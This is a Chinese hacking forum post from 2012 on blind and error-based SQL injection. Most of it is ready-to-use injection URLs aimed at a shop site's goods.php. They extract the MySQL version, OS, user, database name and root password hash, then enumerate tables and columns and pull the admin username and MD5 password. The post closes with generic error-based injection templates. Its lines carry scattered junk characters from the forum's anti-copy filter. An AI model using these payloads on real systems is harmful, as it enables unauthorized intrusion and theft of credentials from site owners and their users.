找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2064|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ; S' w7 `# t# Y7 C* j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- o6 C+ ]3 z: C( e9 _! h  d! S7 [* n: Q1 h" J9 j
判断系统
( q& e  e3 g/ I  ~: ?  D, a" D
% V" _( B9 @- phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 i7 i# ]: s& D6 q" d4 |( J, }: t( N: L* W
  Q- k# ]9 ^1 @" c+ i  w  f6 ^

  ^  A, M3 K8 k+ V; B7 Z当前 user()4 h3 M! h* o' i/ A" L' Z* O& `

. f4 L2 c2 f* L6 h3 Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 ~- V9 M& K" n4 }. R% u8 [

. s( ^* z* ]5 I1 \) D
* F; Q4 Q& h- @% t! w5 y, ~: ^, p; d
当前 database()
& L& I# a' B! L- Z' d$ Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 @& \8 o& w" j" Y) y( i; R: x2 I* H* c6 }! A, n0 e

+ Z# I/ x3 x# P( Y( [# _" p5 m9 S) L  B9 x

- i( y4 s0 m- J$ H" E2 {2 Xroot hash
5 h$ Z$ @% T8 T3 m+ z3 s9 D  p7 ]6 }: A$ F7 y/ B7 k
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 h5 C! ~% Y7 z) m3 t
, q7 Q1 J" q' L

, `9 [! Z! u) s
) ]6 L+ N! [. [7 ?+ l. M, b当前 数据库表名2 u& `0 j$ X# L* I, F% f  \+ E
; Y5 ~- X( G' x
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% m( q/ q0 `( K/ i) ^; ]* u
  N: n. M% S( H5 x( r
: l2 N5 w3 u, J5 P2 U( k/ ?& i0 e' O# p( `8 F( o: e7 X
当前 数据库 user_name 字段
2 @0 n2 `. ~/ Y  }, [/ k( s7 S: d. |7 a. t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 Q. x7 a8 J& E3 [/ s
" |. G" y& E& O4 @  ^% J: i
当前 数据库 字段 password
8 D; }7 B* b- O1 ~! a) [- C4 U- Shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; E+ ?" s( d$ I7 Q: n
% V0 {* T/ {5 `" @6 p! \' M0 {
( F$ |( h/ z9 h
获得 admin passwd(md5)0 h; m2 T, }2 W8 U! M+ L& u  H

' @6 K8 J$ u$ @: t  o5 O- Z" U3 v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 v- `- G" ]% ]' r

0 }' ?6 q1 B3 Q报错注射
0 g+ z% i$ V# Y# d& `: t3 ^SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, s3 |$ l6 V# Z4 Y8 Y* i; C) j0 z: ?: M8 h
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
3 Z4 ?( Z# x% w3 H6 U* x
4 k) o3 }" u" }7 P( y) m2 K* B5 E! Vand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表